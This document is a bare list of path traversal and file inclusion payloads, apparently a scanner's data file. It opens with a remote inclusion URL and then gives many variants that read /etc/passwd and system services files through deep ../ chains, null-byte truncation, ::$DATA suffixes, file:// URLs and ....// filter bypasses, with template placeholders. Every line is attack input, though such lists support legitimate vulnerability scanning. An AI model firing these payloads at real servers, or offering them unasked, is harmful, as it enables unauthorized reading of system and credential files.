http://wapiti3.ovh/e.php
/etc/passwd
/etc/passwd\0
/etc/services
/etc/services\0
C:\Windows\System32\drivers\etc\services
C:\Windows\System32\drivers\etc\services\0
C:\Windows\System32\drivers\etc\services::$DATA
C:/Windows/System32/drivers/etc/services
C:/Windows/System32/drivers/etc/services\0
C:/Windows/System32/drivers/etc/services::$DATA
../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd\0
../../../../../../../../../../../../../../../../../../../../etc/passwd\0
../../../../../../../../../../etc/services
../../../../../../../../../../../../../../../../../../../../etc/services
../../../../../../../../../../etc/services\0
../../../../../../../../../../../../../../../../../../../../etc/services\0
../../../../../../../../../../Windows/System32/drivers/etc/services
../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
../../../../../../../../../../Windows/System32/drivers/etc/services\0
../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services\0
[VALUE]/../../../../../../../../../../etc/passwd
[VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd
[VALUE]/../../../../../../../../../../etc/passwd\0
[VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0
[VALUE]/../../../../../../../../../../etc/services
[VALUE]/../../../../../../../../../../../../../../../../../../../../etc/services
[VALUE]/../../../../../../../../../../etc/services\0
[VALUE]/../../../../../../../../../../../../../../../../../../../../etc/services\0
[VALUE]/../../../../../../../../../../Windows/System32/drivers/etc/services
[VALUE]/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
[VALUE]/../../../../../../../../../../Windows/System32/drivers/etc/services\0
[VALUE]/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services\0
[DIRVALUE]/../../../../../../../../../../etc/passwd
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd
[DIRVALUE]/../../../../../../../../../../etc/passwd\0
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0
[DIRVALUE]/../../../../../../../../../../etc/services
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/services
[DIRVALUE]/../../../../../../../../../../etc/services\0
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/services\0
[DIRVALUE]/../../../../../../../../../../Windows/System32/drivers/etc/services
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
[DIRVALUE]/../../../../../../../../../../Windows/System32/drivers/etc/services\0
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services\0
file:///etc/passwd
file://C:\Windows\System32\drivers\etc\services
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd\0
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services\0
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//Windows/System32/drivers/etc/services
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//Windows/System32/drivers/etc/services\0
/etc/passwd\0.[EXTVALUE]
c:\Windows\System32\drivers\etc\services\0.[EXTVALUE]
../../../../../../../../../../etc/passwd\0.[EXTVALUE]
../../../../../../../../../../windows/System32/drivers/etc/services\0.[EXTVALUE]
[FILE_NAME]
[FILE_NAME]\0
[FILE_NAME]\0.[EXTVALUE]
[FILE_NAME]::$DATA